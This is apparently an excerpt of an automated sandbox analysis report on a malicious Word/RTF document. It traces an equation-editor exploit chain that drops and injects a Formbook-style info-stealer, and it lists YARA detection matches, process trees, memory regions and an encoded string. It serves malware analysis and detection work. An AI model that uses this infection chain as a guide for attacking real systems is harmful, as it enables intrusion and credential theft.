            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FFB4 NtCreateSection,6_2_00D9FFB4
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FF34 NtQueueApcThread,6_2_00D9FF34
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 5_2_003040905_2_00304090
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004028846_2_00402884
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004028906_2_00402890
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0042E2F36_2_0042E2F3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004012B06_2_004012B0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004033D06_2_004033D0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00417BEE6_2_00417BEE
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00417BF36_2_00417BF3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004114436_2_00411443
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0041143A6_2_0041143A
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004034D06_2_004034D0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004025C06_2_004025C0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004025F96_2_004025F9
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004015806_2_00401580
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004025B36_2_004025B3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004116636_2_00411663
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00402ED06_2_00402ED0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040F6E36_2_0040F6E3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004027096_2_00402709
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DAE0C66_2_00DAE0C6
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DAE2E96_2_00DAE2E9
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DD63DB6_2_00DD63DB
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E563BF6_2_00E563BF
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DFA37B6_2_00DFA37B
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DB23056_2_00DB2305
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E3443E6_2_00E3443E
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E305E36_2_00E305E3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DCC5F06_2_00DCC5F0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DF65406_2_00DF6540
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DBE6C16_2_00DBE6C1
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DB46806_2_00DB4680
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E526226_2_00E52622
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DFA6346_2_00DFA634
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DBC7BC6_2_00DBC7BC
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DBC85C6_2_00DBC85C
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DD286D6_2_00DD286D
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E449F56_2_00E449F5
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DC69FE6_2_00DC69FE
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DB29B26_2_00DB29B2
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E5098E6_2_00E5098E
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DFC9206_2_00DFC920
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E36BCB6_2_00E36BCB
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E5CBA46_2_00E5CBA4
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E52C9C6_2_00E52C9C
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E3AC5E6_2_00E3AC5E
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DBCD5B6_2_00DBCD5B
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DE0D3B6_2_00DE0D3B
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DCEE4C6_2_00DCEE4C
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DE2E2F6_2_00DE2E2F
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E22FDC6_2_00E22FDC
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E4CFB16_2_00E4CFB1
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DC0F3F6_2_00DC0F3F
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DC905A6_2_00DC905A
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E2D06D6_2_00E2D06D
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DB30406_2_00DB3040
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DDD0056_2_00DDD005
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E3D13F6_2_00E3D13F
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E512386_2_00E51238
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DAF3CF6_2_00DAF3CF
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DB73536_2_00DB7353
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DC14896_2_00DC1489
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DE54856_2_00DE5485
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DED47D6_2_00DED47D
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E535DA6_2_00E535DA
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DB351F6_2_00DB351F
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DE57C36_2_00DE57C3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E3579A6_2_00E3579A
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E4771D6_2_00E4771D
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E4F8EE6_2_00E4F8EE
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E2F8C46_2_00E2F8C4
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E3394B6_2_00E3394B
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E359556_2_00E35955
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E63A836_2_00E63A83
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DAFBD76_2_00DAFBD7
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E3DBDA6_2_00E3DBDA
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DD7B006_2_00DD7B00
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E4FDDD6_2_00E4FDDD
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DDDF7C6_2_00DDDF7C
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00E3BF146_2_00E3BF14
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CC58A87_2_00CC58A8
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CC39287_2_00CC3928
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CE25387_2_00CE2538
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CC56887_2_00CC5688
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CC567F7_2_00CC567F
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CCBE387_2_00CCBE38
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CCBE337_2_00CCBE33
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E88C848_2_61E88C84
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E433188_2_61E43318
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E2F2758_2_61E2F275
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E3C53C8_2_61E3C53C
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E244428_2_61E24442
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E6F79E8_2_61E6F79E
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E286E18_2_61E286E1
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E1B9F98_2_61E1B9F9
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E4E99B8_2_61E4E99B
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E3DACD8_2_61E3DACD
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E51DF88_2_61E51DF8
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E42DAC8_2_61E42DAC
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E4FCBB8_2_61E4FCBB
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E15C608_2_61E15C60
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E1FFB18_2_61E1FFB1
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: String function: 00DF373B appears 253 times
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: String function: 00DF3F92 appears 132 times
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: String function: 00DAE2A8 appears 60 times
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: String function: 00DADF5C appears 137 times
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: String function: 00E1F970 appears 84 times
            Source: sqlite3.dll.8.drStatic PE information: Number of sections : 18 > 10
            Source: C:\Windows\SysWOW64\dfrgui.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
            Source: Doc PI.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 6.2.loud89334.scr.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.loud89334.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.loud89334.scr.4c80000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.loud89334.scr.341a370.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.loud89334.scr.4c80000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.loud89334.scr.23f79d0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.loud89334.scr.23fa210.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.loud89334.scr.341a370.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000008.00000002.635052346.0000000000250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.634933640.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.479085527.0000000002AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.407188357.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.370449287.0000000004C80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0000000C.00000002.635242428.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.634993133.0000000000150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.407506842.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.loud89334.scr.4c80000.5.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.loud89334.scr.341a370.4.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.loud89334.scr.4c80000.5.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 5.2.loud89334.scr.341a370.4.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@11/16@13/8
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Doc PI.docJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6FC2.tmpJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: dfrgui.exe, 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: dfrgui.exe, 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: dfrgui.exe, 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: dfrgui.exe, 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: dfrgui.exe, 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: dfrgui.exe, 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: dfrgui.exe, 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: dfrgui.exe, 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: dfrgui.exe, 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: Doc PI.docReversingLabs: Detection: 36%
            Source: Doc PI.docVirustotal: Detection: 41%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\loud89334.scr "C:\Users\user\AppData\Roaming\loud89334.scr"
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess created: C:\Users\user\AppData\Roaming\loud89334.scr "C:\Users\user\AppData\Roaming\loud89334.scr"
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\loud89334.scr "C:\Users\user\AppData\Roaming\loud89334.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess created: C:\Users\user\AppData\Roaming\loud89334.scr "C:\Users\user\AppData\Roaming\loud89334.scr"Jump to behavior
